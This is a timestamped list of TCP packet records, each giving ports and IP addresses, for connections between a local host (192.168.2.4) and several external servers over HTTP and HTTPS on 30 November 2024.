Nov 30, 2024 04:06:46.957309008 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.957350969 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.958213091 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.958256960 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.958281040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.958332062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.959145069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.959187031 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.959223986 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.959269047 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.960099936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.960143089 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.960195065 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.960237980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.961046934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.961096048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.961158037 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.961203098 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.962013006 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.962060928 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.962213039 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.962255001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.962975979 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.963020086 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.963084936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.963129044 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.963938951 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.964008093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.964066029 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.964114904 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.964885950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.964998007 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.965172052 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.965883970 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.965944052 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.965980053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.966022015 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.966820955 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.966865063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.966902018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.967004061 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.967791080 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.967879057 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.968789101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.968916893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.969686031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.969798088 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.970366001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.970649004 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.970690966 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.970750093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.971016884 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.971618891 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.971730947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.971738100 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.971885920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.972558022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.972614050 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.972680092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.973540068 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.973634005 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.974498034 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.974606037 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.975409985 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.975467920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.975512028 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.975565910 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.975672007 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.976419926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.976588964 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.977375031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.977571964 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.978334904 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.978399992 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.978437901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.978679895 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.979290962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.979331017 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.979414940 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.979455948 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.980247974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.980369091 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.980458021 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.981199980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.981312990 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.981969118 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.982131004 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.982207060 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.982249022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.982290030 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.983123064 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.983181000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.983228922 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.983270884 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.984076977 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.984198093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.984272003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:47.579356909 CET	80	49865	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:47.634574890 CET	49865	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:47.702425957 CET	443	49862	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.703144073 CET	443	49862	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.707333088 CET	443	49862	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.708511114 CET	49862	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.768896103 CET	443	49863	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.769598007 CET	443	49863	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.775563955 CET	49863	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.775578976 CET	443	49863	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.785358906 CET	49862	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.785412073 CET	443	49862	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.785480976 CET	49862	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.785619020 CET	443	49862	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.787730932 CET	49862	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.788888931 CET	49863	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.788902998 CET	443	49863	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.788992882 CET	49863	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.789031982 CET	443	49863	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.789347887 CET	49872	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.789370060 CET	443	49872	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:47.790368080 CET	49863	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.790401936 CET	49872	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.791820049 CET	49872	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:47.791834116 CET	443	49872	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:48.027980089 CET	443	49866	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:48.028044939 CET	49866	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:48.033266068 CET	49866	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:48.033276081 CET	443	49866	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:48.033335924 CET	49866	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:48.033480883 CET	443	49866	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:48.033745050 CET	49866	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:48.076703072 CET	443	49868	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:48.078243017 CET	49868	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:48.081442118 CET	49868	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:48.081468105 CET	443	49868	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:48.081715107 CET	443	49868	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:48.083236933 CET	49868	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:48.083338976 CET	49868	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:48.083376884 CET	443	49868	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:48.083451033 CET	49868	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:48.083451986 CET	49868	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:48.099107981 CET	443	49867	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:48.099442005 CET	49867	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:48.103127003 CET	49867	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:48.103142977 CET	443	49867	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:48.103225946 CET	49867	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:48.103271961 CET	443	49867	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:48.103724957 CET	49867	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:48.153500080 CET	443	49869	34.160.144.191	192.168.2.4
Nov 30, 2024 04:06:48.158943892 CET	49869	443	192.168.2.4	34.160.144.191
Nov 30, 2024 04:06:48.162075996 CET	49869	443	192.168.2.4	34.160.144.191
Nov 30, 2024 04:06:48.162084103 CET	443	49869	34.160.144.191	192.168.2.4
Nov 30, 2024 04:06:48.162293911 CET	443	49869	34.160.144.191	192.168.2.4
Nov 30, 2024 04:06:48.164470911 CET	49869	443	192.168.2.4	34.160.144.191
Nov 30, 2024 04:06:48.164529085 CET	49869	443	192.168.2.4	34.160.144.191
Nov 30, 2024 04:06:48.164587021 CET	443	49869	34.160.144.191	192.168.2.4
Nov 30, 2024 04:06:48.164717913 CET	49869	443	192.168.2.4	34.160.144.191
Nov 30, 2024 04:06:48.787811995 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:48.787908077 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:48.788696051 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:48.789046049 CET	49836	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:48.789062977 CET	443	49836	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:49.018837929 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:49.018878937 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:49.019994974 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:49.020334005 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:49.020345926 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:49.312165022 CET	49865	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:49.326666117 CET	49839	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:49.327301979 CET	49879	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:49.432322025 CET	80	49865	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:49.432482004 CET	49865	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:49.446845055 CET	80	49839	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:49.446959972 CET	49839	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:49.447237015 CET	80	49879	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:49.447434902 CET	49879	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:49.447583914 CET	49879	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:49.486785889 CET	49880	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:49.486821890 CET	443	49880	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:49.490622044 CET	49880	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:49.492222071 CET	49880	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:49.492235899 CET	443	49880	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:49.567475080 CET	80	49879	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:49.579849958 CET	443	49872	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:49.580559015 CET	443	49872	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:49.583112955 CET	49872	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:49.583132029 CET	443	49872	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:49.589200020 CET	49872	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:49.589211941 CET	443	49872	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:49.589282990 CET	49872	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:49.589411020 CET	443	49872	142.250.181.78	192.168.2.4
Nov 30, 2024 04:06:49.589545965 CET	49872	443	192.168.2.4	142.250.181.78
Nov 30, 2024 04:06:49.636135101 CET	49881	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:49.636213064 CET	49882	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:49.756113052 CET	80	49881	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:49.756162882 CET	80	49882	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:49.760221958 CET	49881	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:49.760298967 CET	49882	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:49.761286974 CET	49881	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:49.761387110 CET	49882	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:49.881119967 CET	80	49881	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:49.881295919 CET	80	49882	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:49.918303967 CET	49883	443	192.168.2.4	34.120.208.123
Nov 30, 2024 04:06:49.918368101 CET	443	49883	34.120.208.123	192.168.2.4
Nov 30, 2024 04:06:49.918489933 CET	49883	443	192.168.2.4	34.120.208.123
Nov 30, 2024 04:06:49.919929981 CET	49883	443	192.168.2.4	34.120.208.123
Nov 30, 2024 04:06:49.919967890 CET	443	49883	34.120.208.123	192.168.2.4
Nov 30, 2024 04:06:49.925020933 CET	49884	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:49.925046921 CET	443	49884	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:49.926670074 CET	49885	443	192.168.2.4	34.149.100.209
Nov 30, 2024 04:06:49.926686049 CET	443	49885	34.149.100.209	192.168.2.4
Nov 30, 2024 04:06:49.927463055 CET	49884	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:49.927476883 CET	49885	443	192.168.2.4	34.149.100.209
Nov 30, 2024 04:06:49.927634001 CET	49884	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:49.927649021 CET	443	49884	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:49.929147959 CET	49885	443	192.168.2.4	34.149.100.209
Nov 30, 2024 04:06:49.929162979 CET	443	49885	34.149.100.209	192.168.2.4
Nov 30, 2024 04:06:49.977705002 CET	49886	443	192.168.2.4	34.107.243.93
Nov 30, 2024 04:06:49.977756977 CET	443	49886	34.107.243.93	192.168.2.4
Nov 30, 2024 04:06:49.978070974 CET	49886	443	192.168.2.4	34.107.243.93
Nov 30, 2024 04:06:49.979655981 CET	49886	443	192.168.2.4	34.107.243.93
Nov 30, 2024 04:06:49.979666948 CET	443	49886	34.107.243.93	192.168.2.4
Nov 30, 2024 04:06:50.280761003 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:50.291338921 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:50.299338102 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:50.305291891 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:50.305311918 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:50.305562019 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:50.327584028 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:50.331111908 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:50.331137896 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:50.758307934 CET	443	49880	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:50.758380890 CET	49880	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:50.782938957 CET	49880	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:50.782951117 CET	443	49880	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:50.783058882 CET	49880	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:50.783078909 CET	443	49880	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:50.783150911 CET	49880	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:50.783488989 CET	49891	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:50.783513069 CET	443	49891	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:50.783763885 CET	49891	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:50.785068989 CET	49891	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:50.785083055 CET	443	49891	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:50.845880985 CET	80	49882	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:50.884684086 CET	80	49879	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:50.884742022 CET	49879	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:50.887969971 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:50.888207912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:50.891401052 CET	80	49881	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:50.896229029 CET	49882	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:50.934026003 CET	49881	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:50.990819931 CET	49881	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:51.008193016 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:51.008318901 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:51.009691954 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:51.009711981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:51.010266066 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:51.128281116 CET	80	49881	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:51.130171061 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:51.299802065 CET	443	49885	34.149.100.209	192.168.2.4
Nov 30, 2024 04:06:51.300116062 CET	49885	443	192.168.2.4	34.149.100.209
Nov 30, 2024 04:06:51.304308891 CET	49885	443	192.168.2.4	34.149.100.209
Nov 30, 2024 04:06:51.304318905 CET	443	49885	34.149.100.209	192.168.2.4
Nov 30, 2024 04:06:51.304382086 CET	49885	443	192.168.2.4	34.149.100.209
Nov 30, 2024 04:06:51.304533005 CET	443	49885	34.149.100.209	192.168.2.4
Nov 30, 2024 04:06:51.304899931 CET	49885	443	192.168.2.4	34.149.100.209
Nov 30, 2024 04:06:51.370143890 CET	80	49881	34.107.221.82	192.168.2.4
Nov 30, 2024 04:06:51.373785973 CET	443	49884	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:51.373855114 CET	49884	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:51.376863003 CET	49884	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:51.376873016 CET	443	49884	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:51.377126932 CET	443	49884	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:51.378592968 CET	443	49886	34.107.243.93	192.168.2.4
Nov 30, 2024 04:06:51.378603935 CET	443	49883	34.120.208.123	192.168.2.4
Nov 30, 2024 04:06:51.378668070 CET	49886	443	192.168.2.4	34.107.243.93
Nov 30, 2024 04:06:51.378680944 CET	49883	443	192.168.2.4	34.120.208.123
Nov 30, 2024 04:06:51.382736921 CET	49884	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:51.382831097 CET	49884	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:51.382860899 CET	443	49884	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:51.384551048 CET	49884	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:51.385615110 CET	49886	443	192.168.2.4	34.107.243.93
Nov 30, 2024 04:06:51.385621071 CET	443	49886	34.107.243.93	192.168.2.4
Nov 30, 2024 04:06:51.385759115 CET	443	49886	34.107.243.93	192.168.2.4
Nov 30, 2024 04:06:51.385870934 CET	49886	443	192.168.2.4	34.107.243.93
Nov 30, 2024 04:06:51.385881901 CET	443	49886	34.107.243.93	192.168.2.4
Nov 30, 2024 04:06:51.386085987 CET	49883	443	192.168.2.4	34.120.208.123
Nov 30, 2024 04:06:51.386132002 CET	443	49883	34.120.208.123	192.168.2.4
Nov 30, 2024 04:06:51.386184931 CET	49883	443	192.168.2.4	34.120.208.123
Nov 30, 2024 04:06:51.386290073 CET	443	49883	34.120.208.123	192.168.2.4
Nov 30, 2024 04:06:51.386373043 CET	49883	443	192.168.2.4	34.120.208.123
Nov 30, 2024 04:06:51.419831991 CET	49881	80	192.168.2.4	34.107.221.82
Nov 30, 2024 04:06:51.503882885 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:51.503964901 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:51.504062891 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:51.504156113 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:51.504179001 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:51.504190922 CET	49877	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:51.504199982 CET	443	49877	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:51.507690907 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:51.595335007 CET	443	49886	34.107.243.93	192.168.2.4
Nov 30, 2024 04:06:51.595386028 CET	49886	443	192.168.2.4	34.107.243.93
Nov 30, 2024 04:06:51.627599001 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:51.627676964 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:51.627809048 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:51.747729063 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:52.095215082 CET	443	49891	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:52.095283031 CET	49891	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:52.099814892 CET	49891	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:52.099833965 CET	443	49891	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:52.099921942 CET	49891	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:52.099961042 CET	443	49891	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:52.100131989 CET	49891	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:52.345380068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.345428944 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.345513105 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.345524073 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.345671892 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.345681906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.345693111 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.345702887 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.345858097 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.345868111 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.347503901 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.355611086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.467497110 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.467565060 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.467781067 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.471764088 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.471883059 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.471927881 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.472048044 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.537576914 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.537698984 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.538461924 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.541790009 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.541968107 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.543196917 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.550298929 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.550345898 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.552098036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.558798075 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.558907986 CET	80	49892	31.41.244.11	192.168.2.4
